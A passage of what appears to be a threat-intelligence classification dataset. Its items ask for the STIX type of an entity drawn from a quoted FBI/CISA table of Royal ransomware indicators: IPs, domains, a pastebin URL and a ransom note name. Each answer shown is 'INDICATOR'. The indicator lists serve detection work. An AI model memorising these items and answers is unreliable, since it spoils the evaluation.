December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\naltocloudzone.live\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n105.69.155.85\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n179.43.167.10\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n209.141.36.116\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n5.188.86.195\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n41.97.65.51\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n193.149.176.157\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 